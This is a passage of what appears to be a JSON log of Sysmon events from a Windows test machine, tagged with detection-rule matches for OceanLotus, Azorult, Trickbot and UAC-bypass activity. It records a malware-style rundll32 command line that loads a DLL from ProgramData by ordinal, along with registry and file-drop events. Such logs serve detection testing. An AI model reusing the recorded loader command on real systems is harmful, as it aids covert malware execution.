(0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424062,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.375487Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424063,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.375545Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424064,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.376024Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424065,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.376053Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424066,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.376077Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424067,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.376099Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:57:36.406"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424078,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.417723Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"Rundll32.exe shell32.dll,Control_RunDLL C:\\PROGRA~3\\DATAUS~1.DLL 4624665222","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-4690-5F93-0000-002019A60800","LogonId":"0x8a619","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":1216,"ProcessGuid":"747F3D96-51F9-5F93-0000-001003125E00","ProcessId":7552,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-23 21:58:17.171"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":424081,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:17.176847Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\Rundll32.exe","ProcessGuid":"747F3D96-51F9-5F93-0000-001003125E00","ProcessId":7552,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:17.532"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424114,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:17.542300Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Call by Ordinal"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 C:\\PROGRA~3\\DATAUS~1.DLL 4624665222","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-4690-5F93-0000-002019A60800","LogonId":"0x8a619","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"Rundll32.exe shell32.dll,Control_RunDLL C:\\PROGRA~3\\DATAUS~1.DLL 4624665222","ParentImage":"C:\\Windows\\System32\\rundll32.exe","ParentProcessGuid":"747F3D96-51F9-5F93-0000-001003125E00","ParentProcessId":7552,"ProcessGuid":"747F3D96-51F9-5F93-0000-0010551E5E00","ProcessId":9116,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-23 21:58:17.542"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":424115,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:17.543407Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51F9-5F93-0000-0010551E5E00","ProcessId":9116,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:21.688"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424174,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.693498Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424244,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.930237Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424245,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.930339Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424246,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.930392Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424247,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.930441Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424248,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.931190Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424249,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.931290Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424250,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.931385Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424251,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.931451Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:22.063"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424260,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.063160Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51F9-5F93-0000-0010551E5E00","ProcessId":9116,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:22.063"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424262,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.074619Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:22.360"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424320,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.361291Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 21:35:19.617","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FE-5F93-0000-0010DC535E00","ProcessId":8920,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\data.enc","UtcTime":"2020-10-23 21:58:22.360"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":424322,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.364651Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 21:35:19.617","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FE-5F93-0000-0010DC535E00","ProcessId":8920,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\config.xml","UtcTime":"2020-10-23 21:58:22.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":424323,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.391794Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Trickbot Malware Activity"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\wermgr.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Problem Reporting","FileVersion":"10.0.17763.1369 